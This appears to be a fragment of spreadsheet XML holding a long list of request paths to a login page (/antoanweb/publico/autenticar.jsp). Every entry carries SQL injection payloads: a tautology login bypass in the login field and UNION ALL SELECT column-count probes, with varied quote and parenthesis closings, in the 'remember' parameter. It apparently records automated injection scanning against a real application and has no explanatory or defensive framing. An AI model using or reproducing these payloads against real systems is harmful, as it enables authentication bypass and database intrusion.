    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect185,185,185,185,185,185,185#and("fngb"="fngb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect962,962,962,962,962,962,962,962#and("udmg"="udmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3966,3966,3966,3966,3966,3966,3966,3966,3966#and("iexq"="iexq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8756,8756,8756,8756,8756,8756,8756,8756,8756,8756#and("dhbf"="dhbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7678#and(("urld"="urld&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4537,4537#and(("vxpz"="vxpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4936,4936,4936#and(("izgv"="izgv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect707,707,707,707#and(("mzdv"="mzdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2941,2941,2941,2941,2941#and(("nxxz"="nxxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1468,1468,1468,1468,1468,1468#and(("rxmw"="rxmw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5627,5627,5627,5627,5627,5627,5627#and(("xxmf"="xxmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3075,3075,3075,3075,3075,3075,3075,3075#and(("jmqh"="jmqh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect282,282,282,282,282,282,282,282,282#and(("dosz"="dosz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6823,6823,6823,6823,6823,6823,6823,6823,6823,6823#and(("tfjd"="tfjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect822#and((("irpb"="irpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5482,5482#and((("tlnb"="tlnb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3552,3552,3552#and((("hqvo"="hqvo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2039,2039,2039,2039#and((("ltjy"="ltjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2767,2767,2767,2767,2767#and((("zxke"="zxke&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2647,2647,2647,2647,2647,2647#and((("jodd"="jodd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6563,6563,6563,6563,6563,6563,6563#and((("syhm"="syhm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7268,7268,7268,7268,7268,7268,7268,7268#and((("puuy"="puuy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4385,4385,4385,4385,4385,4385,4385,4385,4385#and((("rtnt"="rtnt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7022,7022,7022,7022,7022,7022,7022,7022,7022,7022#and((("rozf"="rozf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7954#and"suza"="suza&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2354,2354#and"bgmj"="bgmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8862,8862,8862#and"mifz"="mifz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8253,8253,8253,8253#and"pdrn"="pdrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4572,4572,4572,4572,4572#and"woef"="woef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5825,5825,5825,5825,5825,5825#and"emzq"="emzq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4242,4242,4242,4242,4242,4242,4242#and"peat"="peat&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7580,7580,7580,7580,7580,7580,7580,7580#and"bmip"="bmip&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6503,6503,6503,6503,6503,6503,6503,6503,6503#and"wohj"="wohj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3284,3284,3284,3284,3284,3284,3284,3284,3284,3284#and"euug"="euug&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6926#and("clhf"like"clhf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1077,1077#and("qmnw"like"qmnw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2320,2320,2320#and("ebvj"like"ebvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2885,2885,2885,2885#and("unek"like"unek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3180,3180,3180,3180,3180#and("omvs"like"omvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2418,2418,2418,2418,2418,2418#and("fvmc"like"fvmc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3257,3257,3257,3257,3257,3257,3257#and("lthn"like"lthn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5752,5752,5752,5752,5752,5752,5752,5752#and("poel"like"poel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect188,188,188,188,188,188,188,188,188#and("slhb"like"slhb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5386,5386,5386,5386,5386,5386,5386,5386,5386,5386#and("mrrl"like"mrrl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9625#and(("pypj"like"pypj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect32,32#and(("vgtp"like"vgtp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9771,9771,9771#and(("btuj"like"btuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5988,5988,5988,5988#and(("icgi"like"icgi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4918,4918,4918,4918,4918#and(("xozd"like"xozd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4420,4420,4420,4420,4420,4420#and(("csac"like"csac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2084,2084,2084,2084,2084,2084,2084#and(("enit"like"enit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6705,6705,6705,6705,6705,6705,6705,6705#and(("hkmt"like"hkmt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9476,9476,9476,9476,9476,9476,9476,9476,9476#and(("gymg"like"gymg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7440,7440,7440,7440,7440,7440,7440,7440,7440,7440#and(("oojh"like"oojh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4150#and((("voor"like"voor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3546,3546#and((("jaza"like"jaza&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4726,4726,4726#and((("sfdd"like"sfdd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2252,2252,2252,2252#and((("jkoi"like"jkoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3386,3386,3386,3386,3386#and((("xmiv"like"xmiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2410,2410,2410,2410,2410,2410#and((("ywsz"like"ywsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1739,1739,1739,1739,1739,1739,1739#and((("hdak"like"hdak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5524,5524,5524,5524,5524,5524,5524,5524#and((("ugyc"like"ugyc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5626,5626,5626,5626,5626,5626,5626,5626,5626#and((("kokg"like"kokg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8895,8895,8895,8895,8895,8895,8895,8895,8895,8895#and((("cliv"like"cliv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2408#and"kewp"like"kewp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6469,6469#and"mdbj"like"mdbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1426,1426,1426#and"flms"like"flms&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4272,4272,4272,4272#and"soci"like"soci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4552,4552,4552,4552,4552#and"qfst"like"qfst&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2850,2850,2850,2850,2850,2850#and"llns"like"llns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect397,397,397,397,397,397,397#and"azen"like"azen&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2853,2853,2853,2853,2853,2853,2853,2853#and"oygo"like"oygo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5882,5882,5882,5882,5882,5882,5882,5882,5882#and"fovk"like"fovk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8399,8399,8399,8399,8399,8399,8399,8399,8399,8399#and"gvlu"like"gvlu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect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#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect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#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect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#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect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#and(588=588&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(9283=9283&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(9730=9730&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(882=882&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(877=877&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(728=728&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(7621=7621&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(7817=7817&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(2921=2921&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(9238=9238&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((9739=9739&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((5735=5735&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((637=637&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((687=687&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((4781=4781&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((170=170&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((3745=3745&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((5951=5951&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((5762=5762&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((6288=6288&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(((1650=1650&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(((8291=8291&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(((935=935&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((6614=6614&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((7203=7203&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((7976=7976&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((9637=9637&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((186=186&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((4352=4352&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((3899=3899&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect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#and('lmwq'='lmwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and('ftqz'='ftqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and('eruh'='eruh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and('chxp'='chxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('rnhg'='rnhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('lkac'='lkac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('vldz'='vldz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('lsol'='lsol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('krqj'='krqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('cjzz'='cjzz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(('mgwv'='mgwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(('uufg'='uufg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(('ehit'='ehit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('scwr'='scwr&amp;modo=entrar</t>
  </si>
  <si>
